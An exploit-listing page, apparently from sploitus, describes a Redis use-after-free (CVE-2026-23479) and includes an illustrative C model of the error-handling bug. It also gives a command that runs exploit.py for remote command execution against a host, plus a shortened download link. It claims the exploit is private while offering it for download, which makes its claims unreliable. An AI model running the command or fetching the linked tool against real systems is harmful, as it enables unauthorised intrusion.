## https://sploitus.com/exploit?id=76D18275-7321-50D6-BBC8-6A581762726A
# redis-server from 7.2.0 until 8.6.3: Remote Code Execution (CVE-2026-23479)
## Overview
A high-severity vulnerability (CVSS 8.8), tracked as CVE-2026-23479 and categorized under CWE-416 (use after free), has been identified in redis-server. Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command.
## Details
- **CVE ID**: [CVE-2026-23479](https://nvd.nist.gov/vuln/detail/CVE-2026-23479)
- **Discovered**: 2026-05-05
- **Published**: 2026-05-05
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command. If a blocked client is evicted during this flow, an authenticated attacker can trigger a use-after-free that may lead to remote code execution. This has been patched in version 8.6.3.
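The error-handling mistake described above, shown as a simplified model. This is an added example, not Redis source code and not taken from the patch: every name in it (`client_t`, `reexecute_command`, `unblock_unchecked`, `unblock_checked`) is hypothetical, and the meaning of the error return is an assumption based on the description. The model marks the client dead instead of freeing it, so the stale access can be counted without undefined behaviour.

```c
/* Added illustration: simplified model, not Redis source code. */
#include <stdbool.h>
#include <stdio.h>

#define OK   0
#define ERR -1
typedef struct { bool live; int flags; } client_t;  /* hypothetical type */
static int stale_accesses;  /* touches of a released client (model only) */

/* Stand-in for eviction. A real server would free() the client; the model
 * only marks it dead so the mistake stays observable. */
static void evict_client(client_t *c) { c->live = false; }

/* Stand-in for re-executing the blocked command. Assumed semantics: returns
 * ERR when the client was released as a side effect of the command. */
static int reexecute_command(client_t *c, bool evicted_during_exec) {
    if (evicted_during_exec) { evict_client(c); return ERR; }
    return OK;
}

/* Bookkeeping performed on the client after the command has run. */
static void finish_unblock(client_t *c) {
    if (!c->live) stale_accesses++;  /* a use-after-free in a real server */
    c->flags &= ~1;                  /* clear the "blocked" bit */
}

/* Flawed flow: the return value is dropped, so the client is always touched. */
int unblock_unchecked(client_t *c, bool evicted) {
    (void)reexecute_command(c, evicted);
    finish_unblock(c);
    return OK;
}

/* Hardened flow: stop as soon as the callee reports the client is gone. */
int unblock_checked(client_t *c, bool evicted) {
    if (reexecute_command(c, evicted) == ERR) return ERR;
    finish_unblock(c);
    return OK;
}

int main(void) {
    client_t a = { true, 1 }, b = { true, 1 };
    unblock_unchecked(&a, true);
    printf("unchecked flow: %d stale access(es)\n", stale_accesses);
    stale_accesses = 0;
    unblock_checked(&b, true);
    printf("checked flow:   %d stale access(es)\n", stale_accesses);
    return 0;
}
```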
## Affected Versions
**Redis Redis:**
- before 8.6.3
## Running
To run the exploit, you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/29ndcrn8)